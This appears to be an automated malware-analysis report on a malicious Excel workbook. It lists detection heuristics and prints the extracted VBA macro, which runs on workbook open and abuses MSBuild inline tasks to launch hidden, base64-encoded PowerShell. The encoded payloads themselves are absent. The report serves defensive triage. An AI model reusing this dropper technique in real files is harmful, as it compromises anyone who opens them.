Verdict: MALICIOUS
Risk Score: 372
Heuristics: 10

- ClamAV: Xls.Dropper.Agent-7132023-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Dropper.Agent-7132023-0
- VBA project inside OOXML [medium, OOXML_VBA, 5 related findings]: Document contains a VBA project — VBA macros present
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]: WScript.Shell usage. Matched line in script:
  Set objShell = CreateObject("WScript.Shell")
- PowerShell reference in VBA [critical, OLE_VBA_PS]: PowerShell reference in VBA. Matched line in script:
  a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);"
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call. Matched line in script:
  Set objShell = CreateObject("WScript.Shell")
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Workbook_Open macro [low, OLE_VBA_WBOPEN]: Workbook_Open macro. Matched line in script:
  Private Sub Workbook_Open()
- Macro/content-enable lure [medium, SE_ENABLE_LURE]: Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.microsoft.com/developer/msbuild/2003 (in document text: OOXML body / shared strings)
Extracted artifacts: 2
Files carved from inside the sample during analysis.

Artifact: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 8595 bytes
SHA-256: 2f40ef2e16c1a57241248287ee297a5a6acc59c31cca184bfc058b3598b616b9
Detection:
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 6 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "Module1"
#If VBA7 Then
Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#Else
Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
#End If
Sub mksrw()
Set objShell = CreateObject("WScript.Shell")
Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim StrFldSearch
StrFldSearch = "C:\Windows\Microsoft.NET\Framework64"
Set RootFolder = oFSO.GetFolder(StrFldSearch)
Set SubFolder = RootFolder.SubFolders
Dim np
For Each folder In SubFolder
strFolder = StrFldSearch & "\" & folder.Name & "\MSBuild.exe"
If oFSO.FileExists(strFolder) Then
np = StrFldSearch & "\" & folder.Name & "\"
End If
Next
Dim fp
fp = objShell.ExpandEnvironmentStrings("%TMP%\tfi.xml")
Dim b1, b2, b3, b4, b5
b1 = "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"
b2 = "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"
b3 = "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"
b4 = "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"
b5 = "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"
Set fl = CreateObject("Scripting.FileSystemObject")
Set File = fl.CreateTextFile(fp, True)
Dim c1
c1 = "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"
Dim a1, a2, a3, a4
a1 = "<Project ToolsVersion=""4.0"" xmlns=""http://schemas.microsoft.com/developer/msbuild/2003""><Target Name=""34rfas""><QWEridxnaPO /></Target><UsingTask TaskName=""QWEridxnaPO"" TaskFactory=""CodeTaskFactory"" AssemblyFile=""C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"" ><Task><Reference Include=""System.Management.Automation"" /><Code Type=""Class"" Language=""cs""><![CDATA[ using System;using System.IO;using System.Diagnostics;using System.Reflection;using System.Runtime.InteropServices;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Text;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class QWEridxnaPO : Task, ITask {public override bool Execute() {"
a2 = "ProcessStartInfo startInfo2 = new ProcessStartInfo(""powershell.exe"");startInfo2.WindowStyle = ProcessWindowStyle.Minimized;startInfo2.Arguments = ""-noP -sta -w 1 -enc " & c1 & """;Process.Start(startInfo2);"
a3 = "ProcessStartInfo startInfo = new ProcessStartInfo(""powershell.exe"");startInfo.WindowStyle = ProcessWindowStyle.Minimized;startInfo.Arguments = ""-noP -sta -w 1 -enc " & b1 & b2 & b3 & b4 & b5 & """;Process.Start(startInfo);"
a4 = "return true;}}]]></Code></Task></UsingTask></Project>"
File.Write a1 & a2 & a3 & a4
File.Close
objShell.Run (np & "MSBuild.exe" & " " & fp)
Sleep (2000)
fl.DeleteFile (fp)
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
mksrw
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```
Artifact: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: xl/vbaProject.bin
Size: 28672 bytes
SHA-256: 1717dbde530376e4acc9427bc3e26dbc81015c6c881befe4fca1667452f55675
Detection:
ClamAV: Xls.Dropper.Agent-7132023-0
Obfuscation or payload: likely (carved artifact contains 6 long base64-like blob(s))